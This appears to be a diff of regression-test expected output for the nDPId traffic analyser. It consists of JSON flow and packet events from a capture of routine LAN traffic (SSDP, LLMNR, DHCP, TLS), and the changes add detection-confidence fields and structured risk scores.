 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1470104400366,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S7cAAAERxybAqAUy4AAA\/PUkFOsAJRvtK70AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="}
 01110{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":548,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":548,"pkt_l4_len":514,"ts_msec":1470104400366,"pkt":"AQBef\/\/66LH8q\/uyCABFAAIWCfIAAAQR9RHAqAUx7\/\/\/+gdsB2wCAmnTTk9USUZZICogSFRUUC8xLjENCkhvc3Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpOVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpDb25uZWN0aW9uTWFuYWdlcjoxDQpOVFM6IHNzZHA6YWxpdmUNCkxvY2F0aW9uOiBodHRwOi8vMTkyLjE2OC41LjQ5OjI4NjkvdXBucGhvc3QvdWRoaXNhcGkuZGxsP2NvbnRlbnQ9dXVpZDo5MzE5Mzk1YS00ZDAzLTQ3NTAtYmIxYi00NjYzOTMzYWI4MTINClVTTjogdXVpZDo5MzE5Mzk1YS00ZDAzLTQ3NTAtYmIxYi00NjYzOTMzYWI4MTI6OnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT05MDANClNlcnZlcjogTWljcm9zb2Z0LVdpbmRvd3MvMTAuMCBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOiBkMDdiNDM1ZDI5OWI0MTc4NGNhM2QyYWUyYjk1OTk0OA0KDQo="}
 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":576,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":576,"pkt_l4_len":522,"ts_msec":1470104400366,"pkt":"MzMAAAAM6LH8q\/uyht1gAAAAAgoRBP6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAAAMB2wHbAIKzRJOT1RJRlkgKiBIVFRQLzEuMQ0KSG9zdDogW0ZGMDI6OkNdOjE5MDANCk5UOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOkNvbm5lY3Rpb25NYW5hZ2VyOjENCk5UUzogc3NkcDphbGl2ZQ0KTG9jYXRpb246IGh0dHA6Ly9bZmU4MDo6OWJkOjgxZGQ6MmZkYzo1NzUwXToyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyDQpVU046IHV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyOjp1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOkNvbm5lY3Rpb25NYW5hZ2VyOjENCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9OTAwDQpTZXJ2ZXI6IE1pY3Jvc29mdC1XaW5kb3dzLzEwLjAgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogZDA3YjQzNWQyOTliNDE3ODRjYTNkMmFlMmI5NTk5NDgNCg0K"}
@@ -357,7 +357,7 @@
 00869{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1470104400983,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1470104400983,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1470104401187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1470104401187,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S70AAAERxyDAqAUy4AAA\/MNuFOsAJYAi+T0AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1470104401902,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104401902,"pkt":"\/\/\/\/\/\/\/\/vO57DLPeCABFAAFIg+0AAEAR9bgAAAAA\/\/\/\/\/wBEAEMBNDMlAQEGANPiBnoAAAAAAAAAAAAAAAAAAAAAAAAAALzuewyz3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLWY3Y2EwZjU3MTI3MGM1MmQ3CQEhAwYPHDM6O\/8A"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104401904,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1470104401904,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1470104401904,"pkt":"\/\/\/\/\/\/\/\/ABNyFooyCABFAABEAABAAEARLl07eNDU\/\/\/\/\/4AAB5sAMADiZERZY1RjNFBBQUJQY0dWdVluUnpBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="}
@@ -365,56 +365,56 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01088{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1470104402518,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"ts_msec":1470104402518,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAACjAABAAEARAqHAqHcB\/\/\/\/\/94dFi4Aj\/bjAAFSEAABAAZMXgzqA2UABQAHMzAwTU5BVAAHAA82LjM1LjEgKHN0YWJsZSkACAAITWlrcm9UaWsACgAEf5YkAAALAAlBWFJKLVg2U0cADAAGUkI0NTBHAA4AAQEADwAQIAGwMAIUAQAAAAAAAAAAAQAQABNldGhlcjItbWFzdGVyLWxvY2Fs"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1470104402518,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"ts_msec":1470104402518,"pkt":"MzMAAAABTF4M6gNlht1gAAAAAI8RAf6AAAAAAAAATl4M\/\/7qA2X\/AgAAAAAAAAAAAAAAAAABFi4WLgCPm0oAAVIRAAEABkxeDOoDZQAFAAczMDBNTkFUAAcADzYuMzUuMSAoc3RhYmxlKQAIAAhNaWtyb1RpawAKAAR\/liQAAAsACUFYUkotWDZTRwAMAAZSQjQ1MEcADgABAQAPABAgAbAwAhQBAAAAAAAAAAABABAAE2V0aGVyMi1tYXN0ZXItbG9jYWw="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1470104402624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1470104402624,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQADwkcU6wAjpJ6zfgAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1470104402624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104402624,"pkt":"AQBeAAD8PKn0WgOECABFAAA3H1kAAAER9MzAqAPs4AAA\/PJ1FOsAI4uZs34AAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1470104402624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104402624,"pkt":"AQBef\/\/6bEAIlAI6CABFAACl1ocAAAERLO7AqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1470104402724,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1470104402724,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQADwkcU6wAjpJ6zfgAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1470104402724,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104402724,"pkt":"AQBeAAD8PKn0WgOECABFAAA3H1wAAAER9MnAqAPs4AAA\/PJ1FOsAI4uZs34AAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1470104403134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104403134,"pkt":"AQBeAAD8SNIkYzEACABFAAA2Ow0AAAER19nAqAUs4AAA\/OVOFOsAIo78hQUAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
